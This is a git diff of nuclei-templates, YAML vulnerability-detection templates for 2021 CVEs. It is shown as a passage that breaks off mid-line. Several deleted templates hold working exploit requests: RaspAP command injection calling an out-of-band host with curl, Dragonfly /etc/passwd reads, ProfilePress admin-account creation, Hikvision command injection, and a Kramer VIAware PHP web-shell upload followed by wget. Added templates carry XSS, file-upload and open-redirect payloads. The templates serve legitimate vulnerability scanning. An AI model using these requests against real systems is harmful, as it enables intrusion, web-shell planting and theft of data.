b/nuclei-templates/CVE-2021/CVE-2021-33357.yaml deleted file mode 100644 index cb52ddd4ea..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-33357.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2021-33357 - -info: - name: RaspAP <=2.6.5 - Remote Command Injection - author: pikpikcu,pdteam - severity: critical - description: | - RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";". - reference: - - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/ - - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf - - https://github.com/RaspAP/raspap-webgui - - https://nvd.nist.gov/vuln/detail/CVE-2021-33357 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-33357 - cwe-id: CWE-78 - tags: cve,cve2021,rce,raspap,oast - -requests: - - method: GET - path: - - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;" - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - words: - - "DHCPEnabled" - - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - 'GET \/([a-z-]+) HTTP' - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-33564.yaml b/nuclei-templates/CVE-2021/CVE-2021-33564.yaml deleted file mode 100644 index f8c09008f5..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-33564.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-33564 - -info: - name: Ruby Dragonfly <1.4.0 - Remote Code Execution - author: 0xsapra - severity: critical - description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility. - reference: - - https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/ - - https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0 - - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5 - - https://github.com/mlr0p/CVE-2021-33564 - - https://nvd.nist.gov/vuln/detail/CVE-2021-33564 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-33564 - cwe-id: CWE-88 - tags: cve,cve2021,rce,ruby,injection - -requests: - - method: GET - path: - - "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==" - - "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3377.yaml b/nuclei-templates/CVE-2021/CVE-2021-3377.yaml deleted file mode 100644 index bceb482946..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-3377.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-3377 - -info: - name: npm ansi_up v4 - Cross-Site Scripting - author: geeknik - severity: medium - description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks. - reference: - - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf - - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 - - https://nvd.nist.gov/vuln/detail/CVE-2021-3377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-3377 - cwe-id: CWE-79 - remediation: Upgrade to v5.0.0 or later. - tags: cve,cve2021,xss,npm - -requests: - - raw: - - |+ - GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 - Host: {{Hostname}} - Connection: close - - unsafe: true - matchers-condition: and - matchers: - - type: word - part: header - words: - - "text/html" - - - type: word - words: - - "com\"/onmouseover=\"alert(1)\">" - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3378.yaml b/nuclei-templates/CVE-2021/CVE-2021-3378.yaml new file mode 100644 index 0000000000..8ae13590a4 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-3378.yaml @@ -0,0 +1,61 @@ +id: CVE-2021-3378 + +info: + name: FortiLogger 4.4.2.2 - Arbitrary File Upload + author: dwisiswant0 + severity: critical + description: | + FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp. + reference: + - https://erberkan.github.io/2021/cve-2021-3378/ + - https://github.com/erberkan/fortilogger_arbitrary_fileupload + - http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html + - http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-3378 + cwe-id: CWE-434 + tags: cve,cve2021,fortilogger,fortigate,fortinet + +requests: + - raw: + - | + POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS + Accept: application/json + Referer: {{BaseURL}} + Connection: close + X-Requested-With: XMLHttpRequest + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + Content-Disposition: form-data; name="file"; filename="poc.txt" + Content-Type: image/png + + POC_TEST + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + + - | + GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "POC_TEST" + part: body + + - type: word + words: + - "text/plain" + - "ASP.NET" + condition: and + part: header + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-33904.yaml b/nuclei-templates/CVE-2021/CVE-2021-33904.yaml new file mode 100644 index 0000000000..331900d021 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-33904.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-33904 + +info: + name: Accela Civic Platform 21.1 - 'servProvCode' XSS + author: geeknik + severity: medium + description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS. + reference: + - https://www.exploit-db.com/exploits/49980 + - https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21 + - http://packetstormsecurity.com/files/163093/Accela-Civic-Platorm-21.1-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-33904 + cwe-id: CWE-79 + tags: cve,cve2021,accela,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"' + - 'servProvCode' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-34473.yaml b/nuclei-templates/CVE-2021/CVE-2021-34473.yaml index e86d9b44c6..68a4fd2b38 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-34473.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-34473.yaml @@ -1,22 +1,20 @@ id: CVE-2021-34473 info: - name: Exchange Server - Remote Code Execution + name: Exchange Server SSRF (ProxyShell) author: arcc,intx0x80,dwisiswant0,r3dg33k severity: critical description: | - Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. + Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. reference: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 - - https://nvd.nist.gov/vuln/detail/CVE-2021-34473 - remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version. + tags: cve,cve2021,ssrf,rce,exchange classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-34473 - tags: cve,cve2021,ssrf,rce,exchange requests: - method: GET @@ -30,6 +28,4 @@ requests: condition: or words: - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" - - "Exchange MAPI/HTTP Connectivity Endpoint" - -# Enhanced by mp on 2022/05/02 + - "Exchange MAPI/HTTP Connectivity Endpoint" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-34621.yaml b/nuclei-templates/CVE-2021/CVE-2021-34621.yaml deleted file mode 100644 index 1cf1c27f69..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-34621.yaml +++ /dev/null @@ -1,112 +0,0 @@ -id: CVE-2021-34621 - -info: - name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness - author: 0xsapra - severity: critical - description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator. - reference: - - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin - - https://nvd.nist.gov/vuln/detail/CVE-2021-34621 - - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/ - - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-34621 - cwe-id: CWE-269 - tags: cve,cve2021,wordpress,wp-plugin - -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 - Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 - Origin: {{BaseURL}} - Referer: {{BaseURL}} - - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="reg_username" - - {{randstr}} - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="reg_email" - - {{randstr}}@example.com - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="reg_password" - - {{randstr}}@example.com - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="reg_password_present" - - true - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="reg_first_name" - - {{randstr}}@example.com - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="reg_last_name" - - {{randstr}}@example.com - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="_wp_http_referer" - - /wp/?page_id=18 - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="pp_current_url" - - {{BaseURL}} - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="wp_capabilities[administrator]" - - 1 - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="signup_form_id" - - 1 - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="signup_referrer_page" - - - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="action" - - pp_ajax_signup - -----------------------------138742543134772812001999326589 - Content-Disposition: form-data; name="melange_id" - - - -----------------------------138742543134772812001999326589-- - - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Origin: {{BaseURL}} - Referer: {{BaseURL}} - - log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In - - - | - GET /wp-admin/ HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Connection: close - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Welcome to your WordPress Dashboard" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-34643.yaml b/nuclei-templates/CVE-2021/CVE-2021-34643.yaml index 9f2ef12d89..8dfd2c16cb 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-34643.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-34643.yaml @@ -1,23 +1,36 @@ id: CVE-2021-34643 info: - name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting + name: WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting author: dhiyaneshDK severity: medium - description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2. + description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. + remediation: | + Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643 - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643 - https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34643 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-34643 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated + epss-score: 0.00116 + epss-percentile: 0.44405 + cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: skaut-bazar_project + product: skaut-bazar + framework: wordpress + tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,skaut-bazar_project,xss -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -27,12 +40,10 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/options-general.php//?page=skatubazar_option HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -40,11 +51,12 @@ requests: words: - "" - - type: status - status: - - 200 - - type: word part: header words: - "text/html" + + - type: status + status: + - 200 +# digest: 490a0046304402206d3a11c0c355a2d754828a3bf9cb67c195bd89e335c164e6c70ff16f69226d9202202f501c665407d0e31660af7d953a8a91410f52a5b28a21f28bf895b7b18f7977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35265.yaml b/nuclei-templates/CVE-2021/CVE-2021-35265.yaml deleted file mode 100644 index 4acd2368ef..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-35265.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-35265 - -info: - name: MaxSite CMS XSS - author: pikpikcu - severity: medium - description: A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page." - reference: - - https://github.com/maxsite/cms/issues/414#issue-726249183 - - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 - - https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-35265 - cwe-id: CWE-79 - tags: cve,cve2021,maxsite,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - - type: word - words: - - '' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2021/cve-2021-35336.yaml b/nuclei-templates/CVE-2021/CVE-2021-35336.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-35336.yaml rename to nuclei-templates/CVE-2021/CVE-2021-35336.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-35587.yaml b/nuclei-templates/CVE-2021/CVE-2021-35587.yaml deleted file mode 100644 index 7f4cbd0ed0..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-35587.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2021-35587 - -info: - name: Oracle Access Manager - Remote Code Execution - author: cckuailong - severity: critical - description: | - The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. - reference: - - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 - - https://nvd.nist.gov/vuln/detail/CVE-2021-35587 - - https://www.oracle.com/security-alerts/cpujan2022.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-35587 - cwe-id: CWE-502 - metadata: - fofa-query: body="/oam/pages/css/login_page.css" - tags: cve,cve2021,oam,rce,java,unauth,oracle - -requests: - - method: GET - path: - - '{{BaseURL}}/oam/server/opensso/sessionservice' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "x-oracle-dms-ecid" - - "x-oracle-dms-rid" - condition: or - case-insensitive: true - - - type: word - part: body - words: - - "/oam/pages/css/general.css" - -# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-3577.yaml b/nuclei-templates/CVE-2021/CVE-2021-3577.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3577.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3577.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-36260.yaml b/nuclei-templates/CVE-2021/CVE-2021-36260.yaml deleted file mode 100644 index 7963796c10..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-36260.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2021-36260 - -info: - name: Hikvision IP camera/NVR - Remote Command Execution - author: pdteam,gy741 - severity: critical - description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. - reference: - - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html - - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-36260 - - https://github.com/Aiminsun/CVE-2021-36260 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-36260 - cwe-id: CWE-77,CWE-20 - metadata: - shodan-query: http.favicon.hash:999357577 - tags: cve,cve2021,hikvision,rce,iot,intrusive - -requests: - - raw: - - | - PUT /SDK/webLanguage HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - $(id>webLib/x) - - - | - GET /x HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers: - - type: dsl - dsl: - - "contains(body_2,'uid=') && contains(body_2,'gid=')" - - "status_code_1 == 500 && status_code_2 == 200" - condition: and - - extractors: - - type: regex - regex: - - "(u|g)id=.*" - -# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-36356.yaml b/nuclei-templates/CVE-2021/CVE-2021-36356.yaml deleted file mode 100644 index fc0224ed28..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-36356.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-36356 -info: - name: Kramer VIAware - Remote Code Execution - author: gy741 - severity: critical - description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. - reference: - - https://www.exploit-db.com/exploits/50856 - - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 - - https://nvd.nist.gov/vuln/detail/CVE-2021-35064 - - https://write-up.github.io/kramerav/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-36356 - cwe-id: CWE-434 - tags: rce,viaware,cve,cve2021,kramer -requests: - - raw: - - | - POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php - - | - GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1 - Host: {{Hostname}} - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/cve-2021-36380.yaml b/nuclei-templates/CVE-2021/CVE-2021-36380.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-36380.yaml rename to nuclei-templates/CVE-2021/CVE-2021-36380.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml b/nuclei-templates/CVE-2021/CVE-2021-36450.yaml deleted file mode 100644 index 7220501c25..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2021-36450 -info: - name: Verint 15.2 - Cross Site Scripting - author: atomiczsec - severity: medium - description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter. - reference: - - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 - - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 - - http://verint.com - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-36450 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Verint Sign-in" - verified: "true" - tags: cve,cve2021,xss,verint -requests: - - raw: - - | - GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 - Host: {{Hostname}} - - | - POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} - redirects: true - max-redirects: 2 - cookie-reuse: true - extractors: - - type: regex - part: header - internal: true - name: csrfp_login - group: 1 - regex: - - 'csrfp_login=([a-zA-Z0-9]+);' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">

    Test

    26" class="loginUserNameText' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3654.yaml b/nuclei-templates/CVE-2021/CVE-2021-3654.yaml new file mode 100644 index 0000000000..50332c40c1 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-3654.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-3654 + +info: + name: noVNC Open Redirect + author: geeknik + severity: medium + description: A user-controlled input redirects noVNC users to an external website. + reference: + - https://seclists.org/oss-sec/2021/q3/188 + - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654 + - https://bugs.python.org/issue32084 + - https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-3654 + cwe-id: CWE-601 + tags: redirect,novnc,cve,cve2021 + +requests: + - method: GET + + path: + - '{{BaseURL}}//example.com/%2f..' + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header + + - type: status + status: + - 302 + - 301 diff --git a/nuclei-templates/CVE-2021/cve-2021-36748.yaml b/nuclei-templates/CVE-2021/CVE-2021-36748.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-36748.yaml rename to nuclei-templates/CVE-2021/CVE-2021-36748.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-37573.yaml b/nuclei-templates/CVE-2021/CVE-2021-37573.yaml index 6d291320a1..2c662dc7e8 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-37573.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-37573.yaml @@ -1,21 +1,18 @@ id: CVE-2021-37573 info: - name: Tiny Java Web Server - Reflected Cross-Site Scripting + name: Tiny Java Web Server - Reflected XSS author: geeknik severity: medium - description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page. reference: - https://seclists.org/fulldisclosure/2021/Aug/13 - - https://nvd.nist.gov/vuln/detail/CVE-2021-37573 - - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt - - http://seclists.org/fulldisclosure/2021/Aug/13 + tags: cve,cve2021,xss,tjws,java classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-37573 cwe-id: CWE-79 - tags: cve,cve2021,xss,tjws,java + description: "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page" requests: - method: GET @@ -37,5 +34,3 @@ requests: part: header words: - text/html - -# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-37580.yaml b/nuclei-templates/CVE-2021/CVE-2021-37580.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-37580.yaml rename to nuclei-templates/CVE-2021/CVE-2021-37580.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-37704.yaml b/nuclei-templates/CVE-2021/CVE-2021-37704.yaml index b5147f128a..4849621398 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-37704.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-37704.yaml @@ -1,21 +1,19 @@ id: CVE-2021-37704 info: - name: phpinfo Resource Exposure + name: phpfastcache phpinfo exposure author: whoever severity: medium - description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. + description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. + tags: cve,cve2021,exposure,phpfastcache,phpinfo reference: - - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 - - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc - - https://packagist.org/packages/phpfastcache/phpfastcache - - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807 + https://github.com/PHPSocialNetwork/phpfastcache/pull/813 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 + cvss-score: 4.30 cve-id: CVE-2021-37704 cwe-id: CWE-668 - tags: 